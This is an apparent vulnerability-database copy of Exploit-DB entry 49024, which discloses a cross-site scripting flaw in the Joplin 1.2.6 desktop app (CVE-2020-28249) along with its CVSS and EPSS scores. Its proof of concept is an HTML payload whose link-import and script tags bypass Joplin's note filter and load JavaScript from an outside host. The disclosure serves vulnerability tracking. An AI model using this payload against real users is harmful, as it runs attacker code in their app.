Lucene search

Philip HolbrookEDB-ID:49024

HistoryNov 09, 2020 - 12:00 a.m.

Joplin 1.2.6 - 'link' Cross Site Scripting

2020-11-0900:00:00

Philip Holbrook

www.exploit-db.com

198

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

35.2%

JSON

# Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting
# Date: 2020-09-21
# Exploit Author: Philip Holbrook (@fhlipZero)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
# Version: 1.2.6
# Tested on: Windows / Mac
# CVE : CVE-2020-28249
# References:
# https://github.com/fhlip0/JopinXSS/blob/main/readme.md

# 1. Technical Details
# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to
bypass the HTML filter

# 2. PoC
# Paste the following payload into a note:

```
<link rel=import
href="data:text/html&comma;<script>alert(XSS)<&sol;script>
<script src="//brutelogic.com.br&sol;1.js&num; </script>
```

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

35.2%

JSON

Related for EDB-ID:49024

Joplin 1.2.6 - &#039;link&#039; Cross Site Scripting

Related

Joplin 1.2.6 - 'link' Cross Site Scripting